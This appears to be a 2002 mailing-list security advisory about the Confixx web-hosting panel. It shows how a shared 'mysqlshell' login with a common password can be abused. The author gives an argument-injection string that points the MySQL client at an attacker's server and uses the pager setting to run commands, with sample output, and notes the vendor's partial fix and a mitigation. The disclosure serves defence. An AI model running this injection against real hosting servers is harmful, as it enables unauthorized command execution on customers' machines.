hi, Information about Confixx (from http://www.confixx.de): ====================================================== Confixx is a comfortable tool to automate customer administration on Linux-based webservers with graphic interfaces for Admin, Resellers and End Users. Currently there are more than 4200 Confixx licenses registered. More than 150 new licenses are added each week. The problem: =========== you can execute commands on a lot of confixx-boxes nearly without any account. you need to know: - a webhostingprovider running confixx - the password of the mysqlshell-user - access to _any_ mysql-server the password of the mysqlshell-user is the same for all customers. normally you can't do anything with this account, if you don't have access to one specific mysql-server. i even found one big german provider, which uses 123456 as password on all his servers for the mysqlshell-account. you have to add a user with the name "-e" on your mysql-server with the password PASSWORD and read access to the table TABLE. now you can do the following: --------------- debian:/root# ssh -l mysqlshell SERVERNAME mysqlshell@SERVERNAME's password: <-- enter here the password from the mysqlshell-user Confixx-MySQL-Login Bitte Usernamen eingeben: --------------- here you have to enter the following string: -e -h IP_OF_YOUR_MYSQL_SERVER TABLE --pager=\\nweb1 after that you get prompted for a password, enter your PASSWORD (from the user "-e" on your mysql-server) here. --------------- web1 Enter password: Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 1951 to server version: 3.23.49-log Type 'help;' or '\h' for help. Type '\c' to clear the buffer. mysql> \P id; PAGER set to id; mysql> show tables; uid=2030(mysqlshell) gid=105(costumer) groups=105(costumer) ... mysql> \P ls /; PAGER set to ls /; mysql> show tables; bin dev home initrd lost+found mnt proc sbin usr www boot etc formmail index.html lib mail opt root tmp var ... Vendor: ====== a customer, who uses confixx, informed the vendor about 20 months(!) ago. confixx just added the following line: export EDITOR="/bin/false"; so you can't use "edit;" at the mysql-prompt anymore and can't get an interactive shell via vi. but you still can login without access to the mysql-server on the attacked server and you can still execute commands on this server. Solution: ======== Delete the mysqlshell-user This is the second problem i found in confixx without searching for problems... When i have some spare time or i get paid for it, i will search for further bugs, i am sure, there are more. Thanks, Ralf
This archive was generated by hypermail 2b30 : Thu Jul 25 2002 - 09:36:36 PDT